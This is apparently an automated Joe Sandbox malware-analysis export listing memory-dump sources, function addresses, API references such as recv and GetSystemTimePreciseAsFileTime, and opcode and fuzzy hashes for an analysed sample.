Memory Dump Source

Source File: 00000000.00000002.2221552321.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5370000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb0d2d941a1647acecff8c547c3c723805cf39ab96b601b218438c45c04d821f
Instruction ID: cc4f7618a6653a6dd7e006bb54dd55d3d008e543f29550dfdc543c32c4ab1c78
Opcode Fuzzy Hash: cb0d2d941a1647acecff8c547c3c723805cf39ab96b601b218438c45c04d821f
Instruction Fuzzy Hash: 3B11E9E794D258BEF16AC141575CAFBAB6FE6877307308426F443C5A52D2CC0A496E32

Function 0537091C Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221552321.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5370000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df863759b509ecbbdce6365f337137a3f3f3baba4255a7baf4619c17fa0ae33b
Instruction ID: d877d75fa510f52c066e18231dc98019fe5294bbd9fea1bc31b6c73a99b5a860
Opcode Fuzzy Hash: df863759b509ecbbdce6365f337137a3f3f3baba4255a7baf4619c17fa0ae33b
Instruction Fuzzy Hash: DE0126E784C258BEF26AC141276D6F56B6FE6DB23033085B7F443D9A13D58C0A4E6932

Function 05370966 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221552321.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5370000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac4455812dfb91a89895fb7b58f94fcf8e1b5f0b4e861929ef121d578d6b0e9d
Instruction ID: f35cdaee016c5b48de3d33b119ccc8d62165816f18b225641a25319d39ad34eb
Opcode Fuzzy Hash: ac4455812dfb91a89895fb7b58f94fcf8e1b5f0b4e861929ef121d578d6b0e9d
Instruction Fuzzy Hash: FA0126D789D168BEB12AC151562D9F7AB6FF1932303308567F043D4D12E1CC0A4DA932

Function 053708A9 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221552321.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5370000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d2f896dd8a8d54dce29d0560fb9bce91597759c5260eedbdd90aaa43d258b2a
Instruction ID: e8b1232435cfb765fb6df458d605c64320d80be48b2fd813d4dd7b40e92ff073
Opcode Fuzzy Hash: 0d2f896dd8a8d54dce29d0560fb9bce91597759c5260eedbdd90aaa43d258b2a
Instruction Fuzzy Hash: 2C01DFE798D119FE716AC182675C9B6AB2FF5C76303308426F443C6E12D2DC0E496E32

Function 05370904 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221552321.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5370000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0aca5ed3a3e11bba6af21d14fbd915001d845109f90752b3754501efc92564
Instruction ID: 7ddd2e6f9ce4d2a27ca936d6afae7fc1e27b41c8c53fa75d8b63d4679a5d63b5
Opcode Fuzzy Hash: ca0aca5ed3a3e11bba6af21d14fbd915001d845109f90752b3754501efc92564
Instruction Fuzzy Hash: CD01D4F7949118FE7169C14167989B6B77FE2C7630330C466F443D6E11D29C0E486E32

Non-executed Functions

Function 009031A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00903323

Strings

1#QNAN, xrefs: 009044C1
1#IND, xrefs: 009044B3
1#SNAN, xrefs: 009044BA
1#INF, xrefs: 009044DE

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: bd2bc94b5b6ac0896ef1d604467dab37350792d0591968489124f6ae8c579b47
Instruction ID: 6efa0a0eea4fbc07f39b5f9fbb8e9f6a0a376e9bec02e799ac21c471c84ca85d
Opcode Fuzzy Hash: bd2bc94b5b6ac0896ef1d604467dab37350792d0591968489124f6ae8c579b47
Instruction Fuzzy Hash: 2DC23FB1E046298FDB25CE28DD407E9B7B9FB44304F1485EAD94DE7280E779AE818F41

Function 008CE0C0 Relevance: 4.6, APIs: 3, Instructions: 102networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000004,00000000), ref: 008CE10B
recv.WS2_32(?,?,00000008,00000000), ref: 008CE140

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 292c548b2444b87f7c8202354fe52e474eff0b9c05f8d484cb44c5a70646282d
Instruction ID: e6d81601af2cd67172b216193ff53a3044d4a978b61cb05b579eda97d49b739a
Opcode Fuzzy Hash: 292c548b2444b87f7c8202354fe52e474eff0b9c05f8d484cb44c5a70646282d
Instruction Fuzzy Hash: 0F31D371A142489BD720CB6DDC81FAB77B8FB09724F04062AF514E7391DA74A845CBA0

Function 00902D10 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
Instruction ID: 6ac9daf33f3fcf7b8457fd4712ed8bfc12c2f2d1cffa6fad575d49810d6ab43f
Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
Instruction Fuzzy Hash: 49F12F71E012199FDF14CFA8C8846AEB7B5FF48314F25826AD919AB385D731AE41CB90

Function 009D8101 Relevance: 1.8, Strings: 1, Instructions: 504COMMON

Download Yara Rule

Strings

&h}&, xrefs: 009D87A5

Memory Dump Source

Source File: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: &h}&
API String ID: 0-2856662816
Opcode ID: 4a0fa6276ec89ca491075557c4b1259db6960184b0342872c66eef2eff31bc19
Instruction ID: b87115505b65a69099efd4e331548ef5b3623e0417ba963ef7838094220f9901
Opcode Fuzzy Hash: 4a0fa6276ec89ca491075557c4b1259db6960184b0342872c66eef2eff31bc19
Instruction Fuzzy Hash: 19F1E2F3E146248BF3044E29DC88366B692EBD4324F2F863CDA98977C5D97E9C058785

Function 008DCBEA Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,008DCF52,?,00000003,00000003,?,008DCF87,?,?,?,00000003,00000003,?,008DC4FD,008C2FB9,00000001), ref: 008DCC03

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
